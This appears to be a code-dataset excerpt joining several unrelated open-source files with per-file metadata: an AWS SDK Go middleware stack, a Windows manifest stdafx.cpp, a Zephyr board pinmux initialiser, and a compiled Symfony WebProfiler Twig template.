if err = addSetLoggerMiddleware(stack, options); err != nil {
return err
}
if err = awsmiddleware.AddClientRequestIDMiddleware(stack); err != nil {
return err
}
if err = smithyhttp.AddComputeContentLengthMiddleware(stack); err != nil {
return err
}
if err = addResolveEndpointMiddleware(stack, options); err != nil {
return err
}
if err = v4.AddComputePayloadSHA256Middleware(stack); err != nil {
return err
}
if err = addRetryMiddlewares(stack, options); err != nil {
return err
}
if err = addHTTPSignerV4Middleware(stack, options); err != nil {
return err
}
if err = awsmiddleware.AddRawResponseToMetadata(stack); err != nil {
return err
}
if err = awsmiddleware.AddRecordResponseTiming(stack); err != nil {
return err
}
if err = addClientUserAgent(stack); err != nil {
return err
}
if err = addRestJsonContentTypeCustomization(stack); err != nil {
return err
}
if err = smithyhttp.AddErrorCloseResponseBodyMiddleware(stack); err != nil {
return err
}
if err = smithyhttp.AddCloseResponseBodyMiddleware(stack); err != nil {
return err
}
if err = addOpTagResourceValidationMiddleware(stack); err != nil {
return err
}
if err = stack.Initialize.Add(newServiceMetadataMiddleware_opTagResource(options.Region), middleware.Before); err != nil {
return err
}
if err = addRequestIDRetrieverMiddleware(stack); err != nil {
return err
}
if err = addResponseErrorMiddleware(stack); err != nil {
return err
}
if err = addRequestResponseLogging(stack, options); err != nil {
return err
}
return nil
}
func newServiceMetadataMiddleware_opTagResource(region string) *awsmiddleware.RegisterServiceMetadata {
return &awsmiddleware.RegisterServiceMetadata{
Region: region,
ServiceID: ServiceID,
SigningName: "finspace",
OperationName: "TagResource",
}
}
|
GO
|
Apache-2.0
|
BrandonRoehl/aws-sdk-go-v2/service/finspace/api_op_TagResource.go
|
36cf4341-3790-478b-b451-44867dcc4c5a
|
[]
|
[]
|
// stdafx.cpp : source file that includes just the standard includes
// App.pch will be the pre-compiled header
// stdafx.obj will contain the pre-compiled type information
#include "stdafx.h"
#if defined _M_IX86
#pragma comment(linker, "/manifestdependency:\"type='win32' name='Microsoft.Windows.Common-Controls' version='6.0.0.0' processorArchitecture='x86' publicKeyToken='6595b64144ccf1df' language='*'\"")
#elif defined _M_IA64
#pragma comment(linker, "/manifestdependency:\"type='win32' name='Microsoft.Windows.Common-Controls' version='6.0.0.0' processorArchitecture='ia64' publicKeyToken='6595b64144ccf1df' language='*'\"")
#elif defined _M_X64
#pragma comment(linker, "/manifestdependency:\"type='win32' name='Microsoft.Windows.Common-Controls' version='6.0.0.0' processorArchitecture='amd64' publicKeyToken='6595b64144ccf1df' language='*'\"")
#else
#pragma comment(linker, "/manifestdependency:\"type='win32' name='Microsoft.Windows.Common-Controls' version='6.0.0.0' processorArchitecture='*' publicKeyToken='6595b64144ccf1df' language='*'\"")
#endif
|
C++
|
MIT
|
4198222025/duilib/ExeDocker/StdAfx.cpp
|
8a40b8d9-96b4-49bc-a5d7-7d8c15f9a352
|
[{"tag": "API_KEY", "value": "6595b64144ccf1df", "start": 1022, "end": 1038, "context": ".0.0.0' processorArchitecture='*' publicKeyToken='6595b64144ccf1df' language='*'\\\"\")\n#endif\n"}, {"tag": "API_KEY", "value": "6595b64144ccf1df", "start": 378, "end": 394, "context": ".0.0' processorArchitecture='x86' publicKeyToken='6595b64144ccf1df' language='*'\\\"\")\n#elif defined _M_IA64\n#pragma c"}, {"tag": "API_KEY", "value": "6595b64144ccf1df", "start": 599, "end": 615, "context": "0.0' processorArchitecture='ia64' publicKeyToken='6595b64144ccf1df' language='*'\\\"\")\n#elif defined _M_X64\n#pragma co"}, {"tag": "API_KEY", "value": "6595b64144ccf1df", "start": 820, "end": 836, "context": ".0' processorArchitecture='amd64' publicKeyToken='6595b64144ccf1df' language='*'\\\"\")\n#else\n#pragma comment(linker, \""}]
|
[{"tag": "KEY", "value": "6595b64144ccf1df", "start": 1022, "end": 1038, "context": ".0.0.0' processorArchitecture='*' publicKeyToken='6595b64144ccf1df' language='*'\\\"\")\n#endif\n"}, {"tag": "KEY", "value": "6595b64144ccf1df", "start": 378, "end": 394, "context": ".0.0' processorArchitecture='x86' publicKeyToken='6595b64144ccf1df' language='*'\\\"\")\n#elif defined _M_IA64\n#pragma c"}, {"tag": "KEY", "value": "6595b64144ccf1df", "start": 599, "end": 615, "context": "0.0' processorArchitecture='ia64' publicKeyToken='6595b64144ccf1df' language='*'\\\"\")\n#elif defined _M_X64\n#pragma co"}, {"tag": "KEY", "value": "6595b64144ccf1df", "start": 820, "end": 836, "context": ".0' processorArchitecture='amd64' publicKeyToken='6595b64144ccf1df' language='*'\\\"\")\n#else\n#pragma comment(linker, \""}]
|
/*
* Copyright (c) 2018, Diego Sueiro <diego.sueiro@gmail.com>
*
* SPDX-License-Identifier: Apache-2.0
*/
#include <init.h>
#include "device_imx.h"
static int colibri_imx7d_m4_pinmux_init(struct device *dev)
{
ARG_UNUSED(dev);
#if DT_NODE_HAS_STATUS(DT_NODELABEL(gpio1), okay)
/* GPIO1_IO02 Mux Config */
IOMUXC_LPSR_SW_MUX_CTL_PAD_GPIO1_IO02 = 0;
IOMUXC_LPSR_SW_PAD_CTL_PAD_GPIO1_IO02 = 0;
#endif
#if DT_NODE_HAS_STATUS(DT_NODELABEL(gpio2), okay)
/* GPIO2_IO26 Mux Config */
IOMUXC_SW_MUX_CTL_PAD_EPDC_GDRL = 5;
IOMUXC_SW_PAD_CTL_PAD_EPDC_GDRL =
IOMUXC_SW_PAD_CTL_PAD_EPDC_GDRL_PS(2) |
IOMUXC_SW_PAD_CTL_PAD_EPDC_GDRL_PE_MASK |
IOMUXC_SW_PAD_CTL_PAD_EPDC_GDRL_HYS_MASK;
#endif
#if DT_NODE_HAS_STATUS(DT_NODELABEL(uart2), okay)
IOMUXC_SW_MUX_CTL_PAD_UART2_RX_DATA =
IOMUXC_SW_MUX_CTL_PAD_UART2_RX_DATA_MUX_MODE(0);
IOMUXC_SW_MUX_CTL_PAD_UART2_TX_DATA =
IOMUXC_SW_MUX_CTL_PAD_UART2_TX_DATA_MUX_MODE(0);
IOMUXC_SW_PAD_CTL_PAD_UART2_RX_DATA =
IOMUXC_SW_PAD_CTL_PAD_UART2_RX_DATA_PE_MASK |
IOMUXC_SW_PAD_CTL_PAD_UART2_RX_DATA_PS(3) |
IOMUXC_SW_PAD_CTL_PAD_UART2_RX_DATA_HYS_MASK |
IOMUXC_SW_PAD_CTL_PAD_UART2_RX_DATA_DSE(0);
IOMUXC_SW_PAD_CTL_PAD_UART2_TX_DATA =
IOMUXC_SW_PAD_CTL_PAD_UART2_TX_DATA_PE_MASK |
IOMUXC_SW_PAD_CTL_PAD_UART2_TX_DATA_PS(3) |
IOMUXC_SW_PAD_CTL_PAD_UART2_RX_DATA_HYS_MASK |
IOMUXC_SW_PAD_CTL_PAD_UART2_TX_DATA_DSE(0);
/* Select TX_PAD for RX data (DTE mode...) */
IOMUXC_UART2_RX_DATA_SELECT_INPUT =
IOMUXC_UART2_RX_DATA_SELECT_INPUT_DAISY(3);
#endif
#if DT_NODE_HAS_STATUS(DT_NODELABEL(i2c1), okay)
IOMUXC_SW_MUX_CTL_PAD_I2C1_SCL =
IOMUXC_SW_MUX_CTL_PAD_I2C1_SCL_MUX_MODE(0) |
IOMUXC_SW_MUX_CTL_PAD_I2C1_SCL_SION_MASK;
IOMUXC_SW_MUX_CTL_PAD_I2C1_SDA =
IOMUXC_SW_MUX_CTL_PAD_I2C1_SDA_MUX_MODE(0) |
IOMUXC_SW_MUX_CTL_PAD_I2C1_SDA_SION_MASK;
IOMUXC_I2C1_SCL_SELECT_INPUT = IOMUXC_I2C1_SCL_SELECT_INPUT_DAISY(1);
IOMUXC_I2C1_SDA_SELECT_INPUT = IOMUXC_I2C1_SDA_SELECT_INPUT_DAISY(1);
IOMUXC_SW_PAD_CTL_PAD_I2C1_SCL =
IOMUXC_SW_PAD_CTL_PAD_I2C1_SCL_PE_MASK |
IOMUXC_SW_PAD_CTL_PAD_I2C1_SCL_PS(3) |
IOMUXC_SW_PAD_CTL_PAD_I2C1_SCL_DSE(0) |
IOMUXC_SW_PAD_CTL_PAD_I2C1_SCL_HYS_MASK;
IOMUXC_SW_PAD_CTL_PAD_I2C1_SDA =
IOMUXC_SW_PAD_CTL_PAD_I2C1_SDA_PE_MASK |
IOMUXC_SW_PAD_CTL_PAD_I2C1_SDA_PS(3) |
IOMUXC_SW_PAD_CTL_PAD_I2C1_SDA_DSE(0) |
IOMUXC_SW_PAD_CTL_PAD_I2C1_SDA_HYS_MASK;
#endif
#if DT_NODE_HAS_STATUS(DT_NODELABEL(i2c2), okay)
IOMUXC_SW_MUX_CTL_PAD_I2C2_SCL =
IOMUXC_SW_MUX_CTL_PAD_I2C2_SCL_MUX_MODE(0) |
IOMUXC_SW_MUX_CTL_PAD_I2C2_SCL_SION_MASK;
IOMUXC_SW_MUX_CTL_PAD_I2C2_SDA =
IOMUXC_SW_MUX_CTL_PAD_I2C2_SDA_MUX_MODE(0) |
IOMUXC_SW_MUX_CTL_PAD_I2C2_SDA_SION_MASK;
IOMUXC_I2C2_SCL_SELECT_INPUT = IOMUXC_I2C2_SCL_SELECT_INPUT_DAISY(1);
IOMUXC_I2C2_SDA_SELECT_INPUT = IOMUXC_I2C2_SDA_SELECT_INPUT_DAISY(1);
IOMUXC_SW_PAD_CTL_PAD_I2C2_SCL =
IOMUXC_SW_PAD_CTL_PAD_I2C2_SCL_PE_MASK |
IOMUXC_SW_PAD_CTL_PAD_I2C2_SCL_PS(3) |
IOMUXC_SW_PAD_CTL_PAD_I2C2_SCL_DSE(0) |
IOMUXC_SW_PAD_CTL_PAD_I2C2_SCL_HYS_MASK;
IOMUXC_SW_PAD_CTL_PAD_I2C2_SDA =
IOMUXC_SW_PAD_CTL_PAD_I2C2_SDA_PE_MASK |
IOMUXC_SW_PAD_CTL_PAD_I2C2_SDA_PS(3) |
IOMUXC_SW_PAD_CTL_PAD_I2C2_SDA_DSE(0) |
IOMUXC_SW_PAD_CTL_PAD_I2C2_SDA_HYS_MASK;
#endif
#if DT_NODE_HAS_STATUS(DT_NODELABEL(i2c3), okay)
IOMUXC_SW_MUX_CTL_PAD_I2C3_SCL =
IOMUXC_SW_MUX_CTL_PAD_I2C3_SCL_MUX_MODE(0) |
IOMUXC_SW_MUX_CTL_PAD_I2C3_SCL_SION_MASK;
IOMUXC_SW_MUX_CTL_PAD_I2C3_SDA =
IOMUXC_SW_MUX_CTL_PAD_I2C3_SDA_MUX_MODE(0) |
IOMUXC_SW_MUX_CTL_PAD_I2C3_SDA_SION_MASK;
IOMUXC_I2C3_SCL_SELECT_INPUT = IOMUXC_I2C3_SCL_SELECT_INPUT_DAISY(2);
IOMUXC_I2C3_SDA_SELECT_INPUT = IOMUXC_I2C3_SDA_SELECT_INPUT_DAISY(2);
IOMUXC_SW_PAD_CTL_PAD_I2C3_SCL =
IOMUXC_SW_PAD_CTL_PAD_I2C3_SCL_PE_MASK |
IOMUXC_SW_PAD_CTL_PAD_I2C3_SCL_PS(3) |
IOMUXC_SW_PAD_CTL_PAD_I2C3_SCL_DSE(0) |
IOMUXC_SW_PAD_CTL_PAD_I2C3_SCL_HYS_MASK;
IOMUXC_SW_PAD_CTL_PAD_I2C3_SDA =
IOMUXC_SW_PAD_CTL_PAD_I2C3_SDA_PE_MASK |
IOMUXC_SW_PAD_CTL_PAD_I2C3_SDA_PS(3) |
IOMUXC_SW_PAD_CTL_PAD_I2C3_SDA_DSE(0) |
IOMUXC_SW_PAD_CTL_PAD_I2C3_SDA_HYS_MASK;
#endif
#if DT_NODE_HAS_STATUS(DT_NODELABEL(i2c4), okay)
IOMUXC_SW_MUX_CTL_PAD_ENET1_RGMII_TD2 =
IOMUXC_SW_MUX_CTL_PAD_ENET1_RGMII_TD2_MUX_MODE(3) |
IOMUXC_SW_MUX_CTL_PAD_ENET1_RGMII_TD2_SION_MASK;
IOMUXC_SW_MUX_CTL_PAD_ENET1_RGMII_TD3 =
IOMUXC_SW_MUX_CTL_PAD_ENET1_RGMII_TD3_MUX_MODE(3) |
IOMUXC_SW_MUX_CTL_PAD_ENET1_RGMII_TD3_SION_MASK;
IOMUXC_I2C4_SCL_SELECT_INPUT = IOMUXC_I2C4_SCL_SELECT_INPUT_DAISY(4);
IOMUXC_I2C4_SDA_SELECT_INPUT = IOMUXC_I2C4_SDA_SELECT_INPUT_DAISY(4);
IOMUXC_SW_PAD_CTL_PAD_ENET1_RGMII_TD2 =
IOMUXC_SW_PAD_CTL_PAD_ENET1_RGMII_TD2_PE_MASK |
IOMUXC_SW_PAD_CTL_PAD_ENET1_RGMII_TD2_PS(1) |
IOMUXC_SW_PAD_CTL_PAD_ENET1_RGMII_TD2_DSE(0) |
IOMUXC_SW_PAD_CTL_PAD_ENET1_RGMII_TD2_HYS_MASK;
IOMUXC_SW_PAD_CTL_PAD_ENET1_RGMII_TD3 =
IOMUXC_SW_PAD_CTL_PAD_ENET1_RGMII_TD3_PE_MASK |
IOMUXC_SW_PAD_CTL_PAD_ENET1_RGMII_TD3_PS(1) |
IOMUXC_SW_PAD_CTL_PAD_ENET1_RGMII_TD3_DSE(0) |
IOMUXC_SW_PAD_CTL_PAD_ENET1_RGMII_TD3_HYS_MASK;
#endif
#if DT_NODE_HAS_STATUS(DT_NODELABEL(pwm1), okay)
IOMUXC_SW_MUX_CTL_PAD_GPIO1_IO08 =
IOMUXC_SW_MUX_CTL_PAD_GPIO1_IO08_MUX_MODE(7);
IOMUXC_SW_PAD_CTL_PAD_GPIO1_IO08 =
IOMUXC_SW_PAD_CTL_PAD_GPIO1_IO08_PE_MASK |
IOMUXC_SW_PAD_CTL_PAD_GPIO1_IO08_PS(3) |
IOMUXC_SW_PAD_CTL_PAD_GPIO1_IO08_DSE(0) |
IOMUXC_SW_PAD_CTL_PAD_GPIO1_IO08_HYS_MASK;
#endif
#if DT_NODE_HAS_STATUS(DT_NODELABEL(pwm2), okay)
IOMUXC_SW_MUX_CTL_PAD_GPIO1_IO09 =
IOMUXC_SW_MUX_CTL_PAD_GPIO1_IO09_MUX_MODE(7);
IOMUXC_SW_PAD_CTL_PAD_GPIO1_IO09 =
IOMUXC_SW_PAD_CTL_PAD_GPIO1_IO09_PE_MASK |
IOMUXC_SW_PAD_CTL_PAD_GPIO1_IO09_PS(3) |
IOMUXC_SW_PAD_CTL_PAD_GPIO1_IO09_DSE(0) |
IOMUXC_SW_PAD_CTL_PAD_GPIO1_IO09_HYS_MASK;
#endif
#if DT_NODE_HAS_STATUS(DT_NODELABEL(pwm3), okay)
IOMUXC_SW_MUX_CTL_PAD_GPIO1_IO10 =
IOMUXC_SW_MUX_CTL_PAD_GPIO1_IO10_MUX_MODE(7);
IOMUXC_SW_PAD_CTL_PAD_GPIO1_IO10 =
IOMUXC_SW_PAD_CTL_PAD_GPIO1_IO10_PE_MASK |
IOMUXC_SW_PAD_CTL_PAD_GPIO1_IO10_PS(3) |
IOMUXC_SW_PAD_CTL_PAD_GPIO1_IO10_DSE(0) |
IOMUXC_SW_PAD_CTL_PAD_GPIO1_IO10_HYS_MASK;
#endif
#if DT_NODE_HAS_STATUS(DT_NODELABEL(pwm4), okay)
IOMUXC_SW_MUX_CTL_PAD_GPIO1_IO11 =
IOMUXC_SW_MUX_CTL_PAD_GPIO1_IO11_MUX_MODE(7);
IOMUXC_SW_PAD_CTL_PAD_GPIO1_IO11 =
IOMUXC_SW_PAD_CTL_PAD_GPIO1_IO11_PE_MASK |
IOMUXC_SW_PAD_CTL_PAD_GPIO1_IO11_PS(3) |
IOMUXC_SW_PAD_CTL_PAD_GPIO1_IO11_DSE(0) |
IOMUXC_SW_PAD_CTL_PAD_GPIO1_IO11_HYS_MASK;
#endif
return 0;
}
SYS_INIT(colibri_imx7d_m4_pinmux_init, PRE_KERNEL_1, 0);
|
C
|
Apache-2.0
|
MarekPorwisz/sdk-zephyr/boards/arm/colibri_imx7d_m4/pinmux.c
|
c35cf66d-cb06-4a7d-bae2-abb0bb8a4b74
|
[{"tag": "NAME", "value": "Diego Sueiro", "start": 26, "end": 38, "context": "/*\n * Copyright (c) 2018, Diego Sueiro <diego.sueiro@gmail.com>\n *\n * SPDX-License-Ident"}, {"tag": "EMAIL", "value": "diego.sueiro@gmail.com", "start": 40, "end": 62, "context": "/*\n * Copyright (c) 2018, Diego Sueiro <diego.sueiro@gmail.com>\n *\n * SPDX-License-Identifier: Apache-2.0\n */\n\n#"}]
|
[{"tag": "NAME", "value": "Diego Sueiro", "start": 26, "end": 38, "context": "/*\n * Copyright (c) 2018, Diego Sueiro <diego.sueiro@gmail.com>\n *\n * SPDX-License-Ident"}, {"tag": "EMAIL", "value": "diego.sueiro@gmail.com", "start": 40, "end": 62, "context": "/*\n * Copyright (c) 2018, Diego Sueiro <diego.sueiro@gmail.com>\n *\n * SPDX-License-Identifier: Apache-2.0\n */\n\n#"}]
|
<?php
/* @WebProfiler/Collector/request.html.twig */
class __TwigTemplate_54ae96fc6f0720df0c63e5050337569a47d5590cfb054fa89dafdd68877aad9d extends Twig_Template
{
public function __construct(Twig_Environment $env)
{
parent::__construct($env);
// line 1
$this->parent = $this->loadTemplate("@WebProfiler/Profiler/layout.html.twig", "@WebProfiler/Collector/request.html.twig", 1);
$this->blocks = array(
'toolbar' => array($this, 'block_toolbar'),
'menu' => array($this, 'block_menu'),
'panel' => array($this, 'block_panel'),
);
}
protected function doGetParent(array $context)
{
return "@WebProfiler/Profiler/layout.html.twig";
}
protected function doDisplay(array $context, array $blocks = array())
{
$__internal_a2d27283249ac527c793dff82643065cf57bd428df8d4dc250d06071d7eac723 = $this->env->getExtension("native_profiler");
$__internal_a2d27283249ac527c793dff82643065cf57bd428df8d4dc250d06071d7eac723->enter($__internal_a2d27283249ac527c793dff82643065cf57bd428df8d4dc250d06071d7eac723_prof = new Twig_Profiler_Profile($this->getTemplateName(), "template", "@WebProfiler/Collector/request.html.twig"));
$this->parent->display($context, array_merge($this->blocks, $blocks));
$__internal_a2d27283249ac527c793dff82643065cf57bd428df8d4dc250d06071d7eac723->leave($__internal_a2d27283249ac527c793dff82643065cf57bd428df8d4dc250d06071d7eac723_prof);
}
// line 3
public function block_toolbar($context, array $blocks = array())
{
$__internal_820128d1d88c12e4b8fde3a93c60ac7d3467be36f811db26944129bbb13d47d8 = $this->env->getExtension("native_profiler");
$__internal_820128d1d88c12e4b8fde3a93c60ac7d3467be36f811db26944129bbb13d47d8->enter($__internal_820128d1d88c12e4b8fde3a93c60ac7d3467be36f811db26944129bbb13d47d8_prof = new Twig_Profiler_Profile($this->getTemplateName(), "block", "toolbar"));
// line 4
echo " ";
ob_start();
// line 5
echo " ";
if ($this->getAttribute($this->getAttribute((isset($context["collector"]) ? $context["collector"] : null), "controller", array(), "any", false, true), "class", array(), "any", true, true)) {
// line 6
echo " ";
$context["link"] = $this->env->getExtension('code')->getFileLink($this->getAttribute($this->getAttribute((isset($context["collector"]) ? $context["collector"] : $this->getContext($context, "collector")), "controller", array()), "file", array()), $this->getAttribute($this->getAttribute((isset($context["collector"]) ? $context["collector"] : $this->getContext($context, "collector")), "controller", array()), "line", array()));
// line 7
echo " ";
if ((isset($context["link"]) ? $context["link"] : $this->getContext($context, "link"))) {
echo "<a href=\"";
echo twig_escape_filter($this->env, (isset($context["link"]) ? $context["link"] : $this->getContext($context, "link")), "html", null, true);
echo "\" title=\"";
echo twig_escape_filter($this->env, $this->getAttribute($this->getAttribute((isset($context["collector"]) ? $context["collector"] : $this->getContext($context, "collector")), "controller", array()), "file", array()), "html", null, true);
echo "\">";
} else {
echo "<span>";
}
// line 8
echo "
";
// line 9
echo twig_escape_filter($this->env, strip_tags($this->env->getExtension('code')->abbrClass($this->getAttribute($this->getAttribute((isset($context["collector"]) ? $context["collector"] : $this->getContext($context, "collector")), "controller", array()), "class", array()))), "html", null, true);
// line 11
if ($this->getAttribute($this->getAttribute((isset($context["collector"]) ? $context["collector"] : $this->getContext($context, "collector")), "controller", array()), "method", array())) {
// line 12
echo " :: ";
echo twig_escape_filter($this->env, $this->getAttribute($this->getAttribute((isset($context["collector"]) ? $context["collector"] : $this->getContext($context, "collector")), "controller", array()), "method", array()), "html", null, true);
}
// line 15
if ((isset($context["link"]) ? $context["link"] : $this->getContext($context, "link"))) {
echo "</a>";
} else {
echo "</span>";
}
// line 16
echo " ";
} else {
// line 17
echo " <span>";
echo twig_escape_filter($this->env, $this->getAttribute((isset($context["collector"]) ? $context["collector"] : $this->getContext($context, "collector")), "controller", array()), "html", null, true);
echo "</span>
";
}
// line 19
echo " ";
$context["request_handler"] = ('' === $tmp = ob_get_clean()) ? '' : new Twig_Markup($tmp, $this->env->getCharset());
// line 20
echo "
";
// line 21
$context["request_status_code_color"] = ((($this->getAttribute((isset($context["collector"]) ? $context["collector"] : $this->getContext($context, "collector")), "statuscode", array()) >= 400)) ? ("red") : (((($this->getAttribute((isset($context["collector"]) ? $context["collector"] : $this->getContext($context, "collector")), "statuscode", array()) >= 300)) ? ("yellow") : ("green"))));
// line 22
echo "
";
// line 23
ob_start();
// line 24
echo " <span class=\"sf-toolbar-status sf-toolbar-status-";
echo twig_escape_filter($this->env, (isset($context["request_status_code_color"]) ? $context["request_status_code_color"] : $this->getContext($context, "request_status_code_color")), "html", null, true);
echo "\">";
echo twig_escape_filter($this->env, $this->getAttribute((isset($context["collector"]) ? $context["collector"] : $this->getContext($context, "collector")), "statuscode", array()), "html", null, true);
echo "</span>
";
// line 25
if ($this->getAttribute((isset($context["collector"]) ? $context["collector"] : $this->getContext($context, "collector")), "route", array())) {
// line 26
echo " <span class=\"sf-toolbar-label\">@</span>
<span class=\"sf-toolbar-value sf-toolbar-info-piece-additional\">";
// line 27
echo twig_escape_filter($this->env, $this->getAttribute((isset($context["collector"]) ? $context["collector"] : $this->getContext($context, "collector")), "route", array()), "html", null, true);
echo "</span>
";
}
// line 29
echo " ";
$context["icon"] = ('' === $tmp = ob_get_clean()) ? '' : new Twig_Markup($tmp, $this->env->getCharset());
// line 30
echo "
";
// line 31
ob_start();
// line 32
echo " <div class=\"sf-toolbar-info-piece\">
<b>HTTP status</b>
<span>";
// line 34
echo twig_escape_filter($this->env, $this->getAttribute((isset($context["collector"]) ? $context["collector"] : $this->getContext($context, "collector")), "statuscode", array()), "html", null, true);
echo " ";
echo twig_escape_filter($this->env, $this->getAttribute((isset($context["collector"]) ? $context["collector"] : $this->getContext($context, "collector")), "statustext", array()), "html", null, true);
echo "</span>
</div>
<div class=\"sf-toolbar-info-piece\">
<b>Controller</b>
<span>";
// line 39
echo twig_escape_filter($this->env, (isset($context["request_handler"]) ? $context["request_handler"] : $this->getContext($context, "request_handler")), "html", null, true);
echo "</span>
</div>
";
// line 42
if ($this->getAttribute($this->getAttribute((isset($context["collector"]) ? $context["collector"] : null), "controller", array(), "any", false, true), "class", array(), "any", true, true)) {
// line 43
echo " <div class=\"sf-toolbar-info-piece\">
<b>Controller class</b>
<span>";
// line 45
echo twig_escape_filter($this->env, $this->getAttribute($this->getAttribute((isset($context["collector"]) ? $context["collector"] : $this->getContext($context, "collector")), "controller", array()), "class", array()), "html", null, true);
echo "</span>
</div>
";
}
// line 48
echo "
<div class=\"sf-toolbar-info-piece\">
<b>Route name</b>
<span>";
// line 51
echo twig_escape_filter($this->env, (($this->getAttribute((isset($context["collector"]) ? $context["collector"] : null), "route", array(), "any", true, true)) ? (_twig_default_filter($this->getAttribute((isset($context["collector"]) ? $context["collector"] : null), "route", array()), "NONE")) : ("NONE")), "html", null, true);
echo "</span>
</div>
<div class=\"sf-toolbar-info-piece\">
<b>Has session</b>
<span>";
// line 56
if (twig_length_filter($this->env, $this->getAttribute((isset($context["collector"]) ? $context["collector"] : $this->getContext($context, "collector")), "sessionmetadata", array()))) {
echo "yes";
} else {
echo "no";
}
echo "</span>
</div>
";
$context["text"] = ('' === $tmp = ob_get_clean()) ? '' : new Twig_Markup($tmp, $this->env->getCharset());
// line 59
echo "
";
// line 60
echo twig_include($this->env, $context, "@WebProfiler/Profiler/toolbar_item.html.twig", array("link" => (isset($context["profiler_url"]) ? $context["profiler_url"] : $this->getContext($context, "profiler_url"))));
echo "
";
$__internal_820128d1d88c12e4b8fde3a93c60ac7d3467be36f811db26944129bbb13d47d8->leave($__internal_820128d1d88c12e4b8fde3a93c60ac7d3467be36f811db26944129bbb13d47d8_prof);
}
// line 63
public function block_menu($context, array $blocks = array())
{
$__internal_8ec6c75c9011a9771c6292f985ecfb037ed67c2c4472b38bc260400acf9dc895 = $this->env->getExtension("native_profiler");
$__internal_8ec6c75c9011a9771c6292f985ecfb037ed67c2c4472b38bc260400acf9dc895->enter($__internal_8ec6c75c9011a9771c6292f985ecfb037ed67c2c4472b38bc260400acf9dc895_prof = new Twig_Profiler_Profile($this->getTemplateName(), "block", "menu"));
// line 64
echo " <span class=\"label\">
<span class=\"icon\">";
// line 65
echo twig_include($this->env, $context, "@WebProfiler/Icon/request.svg");
echo "</span>
<strong>Request / Response</strong>
</span>
";
$__internal_8ec6c75c9011a9771c6292f985ecfb037ed67c2c4472b38bc260400acf9dc895->leave($__internal_8ec6c75c9011a9771c6292f985ecfb037ed67c2c4472b38bc260400acf9dc895_prof);
}
// line 70
public function block_panel($context, array $blocks = array())
{
$__internal_623d89ee401d94928375fd08ad0031816f48dfd5b8676b9f48dbe4e6b972aeb5 = $this->env->getExtension("native_profiler");
$__internal_623d89ee401d94928375fd08ad0031816f48dfd5b8676b9f48dbe4e6b972aeb5->enter($__internal_623d89ee401d94928375fd08ad0031816f48dfd5b8676b9f48dbe4e6b972aeb5_prof = new Twig_Profiler_Profile($this->getTemplateName(), "block", "panel"));
// line 71
echo " <div class=\"sf-tabs\">
<div class=\"tab\">
<h3 class=\"tab-title\">Request</h3>
<div class=\"tab-content\">
<h3>GET Parameters</h3>
";
// line 78
if (twig_test_empty($this->getAttribute($this->getAttribute((isset($context["collector"]) ? $context["collector"] : $this->getContext($context, "collector")), "requestquery", array()), "all", array()))) {
// line 79
echo " <div class=\"empty\">
<p>No GET parameters</p>
</div>
";
} else {
// line 83
echo " ";
echo twig_include($this->env, $context, "@WebProfiler/Profiler/bag.html.twig", array("bag" => $this->getAttribute((isset($context["collector"]) ? $context["collector"] : $this->getContext($context, "collector")), "requestquery", array())), false);
echo "
";
}
// line 85
echo "
<h3>POST Parameters</h3>
";
// line 88
if (twig_test_empty($this->getAttribute($this->getAttribute((isset($context["collector"]) ? $context["collector"] : $this->getContext($context, "collector")), "requestrequest", array()), "all", array()))) {
// line 89
echo " <div class=\"empty\">
<p>No POST parameters</p>
</div>
";
} else {
// line 93
echo " ";
echo twig_include($this->env, $context, "@WebProfiler/Profiler/bag.html.twig", array("bag" => $this->getAttribute((isset($context["collector"]) ? $context["collector"] : $this->getContext($context, "collector")), "requestrequest", array())), false);
echo "
";
}
// line 95
echo "
<h3>Request Attributes</h3>
";
// line 98
if (twig_test_empty($this->getAttribute($this->getAttribute((isset($context["collector"]) ? $context["collector"] : $this->getContext($context, "collector")), "requestattributes", array()), "all", array()))) {
// line 99
echo " <div class=\"empty\">
<p>No attributes</p>
</div>
";
} else {
// line 103
echo " ";
echo twig_include($this->env, $context, "@WebProfiler/Profiler/bag.html.twig", array("bag" => $this->getAttribute((isset($context["collector"]) ? $context["collector"] : $this->getContext($context, "collector")), "requestattributes", array())), false);
echo "
";
}
// line 105
echo "
<h3>Cookies</h3>
";
// line 108
if (twig_test_empty($this->getAttribute($this->getAttribute((isset($context["collector"]) ? $context["collector"] : $this->getContext($context, "collector")), "requestcookies", array()), "all", array()))) {
// line 109
echo " <div class=\"empty\">
<p>No cookies</p>
</div>
";
} else {
// line 113
echo " ";
echo twig_include($this->env, $context, "@WebProfiler/Profiler/bag.html.twig", array("bag" => $this->getAttribute((isset($context["collector"]) ? $context["collector"] : $this->getContext($context, "collector")), "requestcookies", array())), false);
echo "
";
}
// line 115
echo "
<h3>Request Headers</h3>
";
// line 117
echo twig_include($this->env, $context, "@WebProfiler/Profiler/bag.html.twig", array("bag" => $this->getAttribute((isset($context["collector"]) ? $context["collector"] : $this->getContext($context, "collector")), "requestheaders", array()), "labels" => array(0 => "Header", 1 => "Value")), false);
echo "
<h3>Request Content</h3>
";
// line 121
if (($this->getAttribute((isset($context["collector"]) ? $context["collector"] : $this->getContext($context, "collector")), "content", array()) == false)) {
// line 122
echo " <div class=\"empty\">
<p>Request content not available (it was retrieved as a resource).</p>
</div>
";
} elseif ($this->getAttribute( // line 125
(isset($context["collector"]) ? $context["collector"] : $this->getContext($context, "collector")), "content", array())) {
// line 126
echo " <div class=\"card\">
<pre class=\"break-long-words\">";
// line 127
echo twig_escape_filter($this->env, $this->getAttribute((isset($context["collector"]) ? $context["collector"] : $this->getContext($context, "collector")), "content", array()), "html", null, true);
echo "</pre>
</div>
";
} else {
// line 130
echo " <div class=\"empty\">
<p>No content</p>
</div>
";
}
// line 134
echo "
<h3>Server Parameters</h3>
";
// line 136
echo twig_include($this->env, $context, "@WebProfiler/Profiler/bag.html.twig", array("bag" => $this->getAttribute((isset($context["collector"]) ? $context["collector"] : $this->getContext($context, "collector")), "requestserver", array())), false);
echo "
</div>
</div>
<div class=\"tab\">
<h3 class=\"tab-title\">Response</h3>
<div class=\"tab-content\">
<h3>Response Headers</h3>
";
// line 146
echo twig_include($this->env, $context, "@WebProfiler/Profiler/bag.html.twig", array("bag" => $this->getAttribute((isset($context["collector"]) ? $context["collector"] : $this->getContext($context, "collector")), "responseheaders", array()), "labels" => array(0 => "Header", 1 => "Value")), false);
echo "
</div>
</div>
<div class=\"tab ";
// line 150
echo ((twig_test_empty($this->getAttribute((isset($context["collector"]) ? $context["collector"] : $this->getContext($context, "collector")), "sessionmetadata", array()))) ? ("disabled") : (""));
echo "\">
<h3 class=\"tab-title\">Session</h3>
<div class=\"tab-content\">
